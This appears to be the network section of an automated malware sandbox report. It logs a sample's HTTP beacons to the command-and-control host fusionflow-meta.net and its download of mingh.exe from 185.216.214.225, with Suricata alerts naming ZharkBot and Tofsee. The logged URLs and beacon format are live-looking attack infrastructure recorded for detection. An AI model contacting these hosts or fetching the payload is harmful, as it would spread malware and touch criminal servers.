Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
fusionflow-meta.net | 172.67.162.233 |
GET
200
https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7
REQUEST
RESPONSE
BODY
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: fusionflow-meta.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 08 Aug 2024 22:49:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=nf187jofkm9m1d5jk2124337ba; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DlRDStyiy5U0GnMkyn2o%2BjIta%2F%2BLggsxENXpVb92sm7qhFkkP7auJWuwkaQAfZQqfRvNNKkEIWIecnIxg8R5xEPpIQ89FTumgOQvLjpM7l%2FNVvvwwkiivb0%2B5VNQ%2B6F4OzS89fIQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b030ec4ec052ed0-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9BD4
REQUEST
RESPONSE
BODY
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9BD4 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: fusionflow-meta.net
Cache-Control: no-cache
Cookie: PHPSESSID=nf187jofkm9m1d5jk2124337ba
HTTP/1.1 200 OK
Date: Thu, 08 Aug 2024 22:49:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KihLEXAXKrBpw24%2FB2eXz4Wf22PBE299zPjZIo7ibGRHRtWQboNaA05ZYgQXrUwxA0KTkVG9mbv%2FRKCj72uiMxHJkuFtXNwl0dBLEwdLD6%2FYnPQsgao6jw89EIJlNiNFWG8jW3FB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b030edde9b7dbd9-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7
REQUEST
RESPONSE
BODY
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: fusionflow-meta.net
Cache-Control: no-cache
Cookie: PHPSESSID=nf187jofkm9m1d5jk2124337ba
HTTP/1.1 200 OK
Date: Thu, 08 Aug 2024 22:50:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wc3fv5nUllrczad76sj%2B0QAuyc3MCkBxenq5NDCvrzJ7zSYp47jhV5Fy0HjaPmEOdQkr6PTjx%2FazxN%2B4%2FguZiAusRCDAPcMWZeWucqhtPvSuUUj5OOcudsUC5842E%2BmsWzauy113"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b03105a1c08dbd9-LAX
alt-svc: h3=":443"; ma=86400
GET
200
http://185.216.214.225/mingh.exe
REQUEST
RESPONSE
BODY
GET /mingh.exe HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: 185.216.214.225
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 08 Aug 2024 22:49:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 08 Aug 2024 20:19:08 GMT
ETag: "146e00-61f31bd3223c0"
Accept-Ranges: bytes
Content-Length: 1338880
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49165 -> 104.21.74.211:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49167 -> 104.21.74.211:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49166 -> 185.216.214.225:80 | 2054413 | ET MALWARE ZharkBot User-Agent Observed | A Network Trojan was detected |
TCP 192.168.56.101:49166 -> 185.216.214.225:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
TCP 185.216.214.225:80 -> 192.168.56.101:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 185.216.214.225:80 -> 192.168.56.101:49166 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49165 104.21.74.211:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=fusionflow-meta.net | 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a |
TLSv1 192.168.56.101:49167 104.21.74.211:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=fusionflow-meta.net | 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a |
Snort Alerts
No Snort Alerts